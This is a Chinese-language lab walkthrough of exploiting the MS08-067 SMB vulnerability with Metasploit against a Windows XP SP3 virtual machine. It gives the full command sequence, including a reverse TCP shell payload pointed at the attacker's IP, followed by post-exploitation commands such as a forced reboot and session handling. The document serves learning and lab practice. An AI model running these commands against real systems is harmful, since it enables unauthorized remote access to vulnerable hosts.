1:滲透目標
查找並利用Ms08-067漏洞模塊對內網主機進行滲透攻擊,滲透成功拿到會話後,執行一些命令。
2:準備階段
2.1軟件
Kali linux Windows XP SP3 Chinese - Simplified (NX) vmware 15 pro
2.2網絡配置如下
Windows XP SP3 Chinese - Simplified (NX) 操作系統
kali 2019a
2.3 xp系統設置(兩個關閉,三個打開)
(關閉自動更新)(關閉防火牆)否則會一直報連接超時的錯誤
打開三個服務(computer browser)(server)(workstation)
3:滲透測試階段
3.1:整體流程圖
3.2:執行階段
1):查找漏洞(可在網上查找公開的平臺漏洞)
命令:search ms08_067
2):選擇rank等級較高的模塊(這裏只有一個模塊),並選中模塊
命令:use exploit/windows/smb/ms08_067_netapi
#上面的意思是:
exploit 可滲透攻擊的模塊
Windows 操作系統類型
smb
ms08_067_netapi漏洞名稱
查看該模塊的信息
命令:info
3):查找該漏洞可復現的操作系統類型
命令:show targets
這裏我們利用第 34 個操作系統類型進行漏洞復現
4):查看該模塊需要配置的參數
命令:show options
required 項爲 yes 的爲必填項
RHOSTS 要攻擊的目標 IP
RPORT 要攻擊的目標端口
設置要攻擊的 目標ip
命令:set RHOSTS 192.168.0.100
查看配置參數
命令:show options
5):查找可用的攻擊載荷
命令:show payloads
選擇合適的攻擊載荷並設置攻擊載荷
命令:set payload generic/shell_reverse_tcp
設置攻擊機的ip
命令:set lhost 192.168.0.104
設置攻擊機的端口
命令:set lport 4567
設置目標ID(重要命令,一定要寫的,不然沒法連接)
命令:set target 34
run 之前再看一眼配置
6):開始滲透:
命令:exploit
3.3滲透完成
測試命令
重啓xp
命令:shutdown -r -f -t 0
Dir查看當前文件夾
4:總結
從早做到晚
開始忽略了防火牆和自動更新問題
網上查找資料時,好幾個解決方案弄混淆了,最後自己都不知道有些東西做沒做
不知道系統會崩潰,不可逆轉性崩潰
忘記給虛擬機做快照了,最後只好重做系統,設置快照
後臺運行會話:background
Sessions -a #查看所有會話
Sessions -i id # 打開ID=id 的會話